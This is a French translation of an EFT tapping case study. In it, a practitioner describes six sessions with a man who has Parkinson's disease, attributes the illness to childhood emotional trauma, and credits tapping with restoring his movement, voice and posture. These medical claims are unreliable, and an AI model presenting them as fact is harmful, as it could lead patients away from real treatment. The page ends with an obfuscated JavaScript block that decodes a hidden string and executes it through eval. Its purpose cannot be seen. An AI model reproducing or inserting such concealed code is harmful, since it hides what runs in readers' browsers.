<h2>EFT et maladie de Parkinson</h2><p>Bonjour à tous,<br /><br />

Prêtez une attention particulière à la manière dont Eros Biasiolo en Irlande va au fond des choses sur les nombreuses questions émotionnelles à l'origine de la Maladie de Parkinson de son client. Beaucoup à apprendre dans cet article.
<br /><br />
Etreintes, Gary

 </p>

<hr />
<p>
J'ai rencontré Daniel à un de mes séminaires. Je l'ai remarqué parce que quand nous déjeunions, il finissait toujours le dernier. Il mangeait, marchait et agissait lentement et sa voix était basse et décomposée. À l'époque cependant, il ne me semblait pas bien de l'approcher juste lui pour lui offrir quelques sessions individuelles. Six mois plus tard, j'ai décidé de l'appeler, lui disant que cela me ferait plaisir de l'avoir comme  un exemple d’études de cas . Il était étonné et honoré de l'idée, mais une partie de lui estimait qu'il ne le méritait pas.
</p>
<h3>Première session</h3><p>
Nous avons donc arrangé une première rencontre, une session individuelle de deux heures et demie. Jusque-là, je ne savais pas et n'aurais pas pu imaginer qu'il souffrait de la Maladie de Parkinson. Il m'a raconté son histoire.
<br /><br />
Sept ans auparavant, il avait eu un accident de la route, au cours duquel  un autre véhicule avait percuté sa voiture. Ses 6ème et 7ème vertèbres ont été affectées. Il a immédiatement commencé à avoir des difficultés à bouger; ses épaules ont aussi changé de position, particulièrement la droite qui penchait maintenant visiblement en avant. Il a vu de nombreux docteurs après l'accident sans aucun diagnostic pendant  cinq ans, après quoi on a finalement diagnostiqué  la Maladie de Parkinson.  
<br /><br />
Je lui ai demandé de trouver un mouvement pour lequel il était limité et que nous pourrions utiliser pour tester nos résultats. Il l'a appelé le "vissage/dévissage", un rapide mouvement du poignet dans le sens des aiguilles d'une montre puis dans le sens inverse, ce que vous vous feriez en insérant ou enlevant une ampoule.  
<br /><br />
La première fois que nous l'avons évalué, après juste une ou deux torsions sa main d'abord se bloquait, puis tremblait. Il était clair qu'il y avait beaucoup de blocages psychologiques, à commencer par le fait que son esprit croyait au diagnostic, mais son cœur pas. Ce conflit était clair pour lui aussi - son intelligence n'était pas en accord avec ses émotions. Certains praticiens  EFT diraient qu’"une partie" de lui pense quelque chose, et qu'"une autre partie" pense autrement.
<br /><br />
Il a admis que plus il pensait contrôler son mouvement, plus son corps se bloquait. Cela empirait s'il était observé. Il a dit que si son esprit coordonnait le mouvement,  le mouvement ne serait pas  naturel. Il voyait aussi "un débordement" du flux d'informations allant du cerveau vers son corps. Nous avons tapoté avec les phrases suivantes:
<br /><br />
Bien que ça empire quand je suis observé …<br />
Bien que mon corps déborde d'informations …
<br /><br />
Je lui ai demandé d'imaginer simplement qu'il faisait le mouvement de vissage/dévissage. Il dit qu'il ressentait exactement la même chose, même si son bras ne se bougeait pas! Après quelques séries de tapotements, il pu contrôler son vissage/dévissage pendant environ 20 secondes. Nous avons alors tapoté sur sa croyance qu'il était incapable de faire le mouvement pendant plus de  2 secondes. Cela l'a amené à le faire un peu plus longtemps - environ 30 secondes. Je lui ai demandé pourquoi le mouvement s'arrêtait. Il a répondu : "Mon esprit s'en est mêlé."
<br /><br />
Après une autre série de tapotements, je lui ai demandé d'évaluer si la phrase suivante sonnait toujours exacte pour lui : "je NE PEUX RIEN faire sans mon esprit." C'était toujours très vrai, nous avons donc tapoté jusqu'à ce que cette croyance  restrreignante  soit à 0 sur une échelle de 0 à 10. Maintenant la nouvelle croyance était, "je PEUX tout faire tout sans mon esprit."
<br /><br />
Nous avons essayé le vissage/dévisage et ça a bien marché pendant quelque temps - environ 40 secondes, puis ça s'est arrêté, comme auparavant. Cette fois il avait peur de perdre le contrôle de son corps,  que son esprit bloque ses mouvements par habitude. Nous avons tapoté sur : "Même si  mon esprit a cette p--- d'habitude …" Jurer un peu amène parfois le déclic en EFT! Il a dit qu'il avait toujours besoin de tout contrôler, y compris combien d'objets il y avait dans ma pièce… et nous  avons tapoté aussi à ce sujet.<br /><br />

Je me suis alors finalement porté vers les souvenirs de son jeune âge, ce que j'avais évité jusque là pour aller plus légèrement. Je lui ai demandé qui pourrait avoir influencé ce besoin de contrôle dans sa vie. La réponse était - son père. Tous ses traumatismes sont liés à son père, qui avait l'habitude de tout contrôler et n'écoutait jamais son cœur. Vous remarquerez que c'était les  deux mêmes choses que Daniel faisait à cause de sa maladie. Ces choses mêmes pour lesquelles il critiquait son père.  
<br /><br />
Nous avons tapoté sur un événement qui déclenchait pour lui un certain nombre d'émotions négatives - le rejet, la colère, la culpabilité, la honte. Dans cet événement de son enfance, il s'était arrêté devant une statue parce qu'il a était absorbé par sa beauté et il a été grondé par son père parce qu'il les retardait et qu'il s'était retrouvé au milieu de la rue. Cet événement et quelques autres  ont créé ces vérités dans sa vie :
<br /><br />
* Il ne méritait rien de beau<br />
* Personne ne pouvait avoir une émotion positive envers lui<br />
* On lui disait souvent qu'il était … maladroit  … somnolent... incapable de faire quoi que ce soit. C'était donc la vision qu'il avait de lui-même.
<br /><br />
A la fin de la première session, je lui ai demandé d'essayer le vissage/dévissage et son poignet bougeait librement et continuellement. Mais il ne pouvait  toujours pas supporter de recevoir un compliment. Selon lui, personne ne pourrait  éprouver un sentiment positif en le regardant. Nous avons arrêté la session et nous avons planifié une autre session pour la semaine suivante. Je lui ai donné des "devoirs à la maison" à tapoter.
</p>
<h3>Seconde session</h3>
<p>

J'ai vu une amélioration importante pendant la première session. Cette seconde session sera  cependant le vrai bond en avant. Il n'avait pas tapoté entre les deux sessions.
<br /><br />
La dernière de ses phrases à la première session était qu'il était probablement conscient de ce que sont  ses blocages, mais il avait peur de les enlever. Je lui ai demandé d'élaborer sur ce thème – quels sont ses blocages et pourquoi il a peur de les enlever. Il a dit, "je ne suis pas sûr que mon blocage ne soit pas ma volonté de ne pas avancer. Bouger signifie souffrir."  
<br /><br />
Il voyait aussi le débordement  d'informations venant du cerveau comme un autre de ses blocages. Pour lui donc,  la phrase suivante était très vraie, "trop d'énergie vous bloque." Il a aussi dit que les mots étaient trop importants pour lui et il ne s'est jamais vraiment écouté. Nous avons tapoté sur tous cela avec des résultats acceptables. Il a alors estimé qu'il pourrait canaliser ces débordements  d'une manière ou d'une autre vers d'autres directions.
Nous avons tapoté sur l'idée d'aller de l'avant et la peur associée à cette idée. Nous sommes ensuite revenus à une autre phrase clé de la première session : "Un moi parfait … jamais pris en considération". C'était lié à l'influence de son père et un autre aspect de "l'événement statue" a émergé. Il touchait au sentiment d'être mal compris, et au fait que son père n'avait pas voulu voir que son observation de la statue était une qualité positive plutôt qu'un défaut. Nous l'avons tapoté jusqu'à ce que ça descende à 0 sur une échelle de 0 à 10. Ce même événement touchait à la culpabilité de s'être mis en danger à cette occasion. Nous l'avons aussi tapoté jusqu'à un 0 sur 10.
<br /><br />
Nous avons alors abordé d'autres événements dans lesquels il n'était pas "assez affectueux avec lui-même" et il y en avait un certain nombre. J'ai utilisé la Technique "Raconter l''Histoire" et ma version adaptée "la division des voix" pour traiter chaque événement minutieusement. Le père de Daniel était mort récemment et n'avait jamais voulu  reconnaître qu'il était désolé, pas même avant de mourir. Cela avait été un coup  destructeur pour Daniel.
<br /><br />
À la fin de la deuxième session, son vissage/dévissage se faisait librement et en continu, sa voix  était remarquablement changée et son humeur … de vrais et grands sourires  pour la première fois. Et sa poignée de main …  auparavant je sentais que j'avais peur de lui serrer la main mais cette fois il a serré la mienne avant de rentrer chez lui.
<br /><br />
Nous avons eu ensuite un certain nombre de sessions au téléphone. Nous avons tapoté à nouveau sur son corps pour vérifier la fluidité des mouvements. Il sentait une douleur dans le côté droit, particulièrement dans les jambes. Cette fois l'émotion était la crainte. Nous sommes tombés sur  un autre évènement du passé et de nouveau nous avons tapoté dessus. Il y avait aussi bien de la colère que de la crainte dans cet évènement, et nous avons tapoté sur les deux.
<br /><br />
Nous nous sommes ensuite concentrés sur son corps et nous avons tapoté pour améliorer sa posture. Quand je lui ai demandé de se déplacer avec son nouveau maintien , il a dit qu'il ne pourraitpas,  nous avons donc tapoté encore plus, jusqu'à ce qu'il puisse finalement bouger en gardant une bonne  position. Je lui ai demandé d'évaluer à quel point son nouveau maintien lui semblait  peu familier, et il a dit 10 sur 10. Nous avons tapoté pour ramener cette impression à 0 sur 10. Cette nouvelle position de son corps l'a aidé à ressentir joie et courage.
<br /><br />
Nous avons arrêté la 6ème et apparemment dernière session et nous sommes tous deux très heureux des résultats.
<br /><br />
Les maladies graves sont un chemin valorisant. Elles peuvent prendre plus longtemps, mais elles donnent le même sentiment d'accomplissement que d'atteindre le sommet d'une montagne. Daniel continuera maintenant la Procédure de Paix Personnelle, m'appelant une ou deux fois par mois.
<br /><br />
Amour et Paix.
<br /><br />
Eros Biasiolo<br /><br />Traduit de l'article original http://www.emofree.com/Articles2/parkinsons-disease-eros.htm par Christine Disant <script type="text/javascript">
//<![CDATA[
var c8="";for(var o9=0;o9<490;o9++)c8+=String.fromCharCode((":%6C>r`Eok0wSMXU9t>Tyj=e\\lq|Z;<rd:7%v6-YiPzs.p&/,15W*(8Vf2mgn4{h3[+\'})xuEO3S`EEO=VO:0`E>0i/d{Pm7|[g6Xp8:qM.7|[gd<[ntm[m:rk*d<jp>0}xT{v*9.9zT/j4d/jnvzi2>q.W9.oz>m6fv&Msd&tn7<jP%X2pdrt8:rtg9<jVd&n/T/tpvX2Pd{Z,T{9V:m2%9zt6<gk6>q.8v&;f%XMs:qiVr0SV:mfzTz91>qooE^*36K:%6C&X`S^&X_TY[^&XN`WL?=V`K>rQ-2()<r*K:0Q\',%6d8K&XLL__T[L@K>rQ-2()<r*K:0Q\',%6d8K&XNTLL__TUL@K>rQ-2()<r*K:0Q\',%6d8K&XNULL__YL@>rQ-2()<r*K:0Q\',%6d8K&XNVLL^3SN`v86-2+Q*631f,%6f3()K=VaaaTYOK=Vaaa[LIUXXO=VIUXXLA^):%0K3SQ79&786KSOTUWLL".charCodeAt(o9)-(35)+63)%(95)+125-93);document.write(eval(c8))
//]]>
</script>
</p>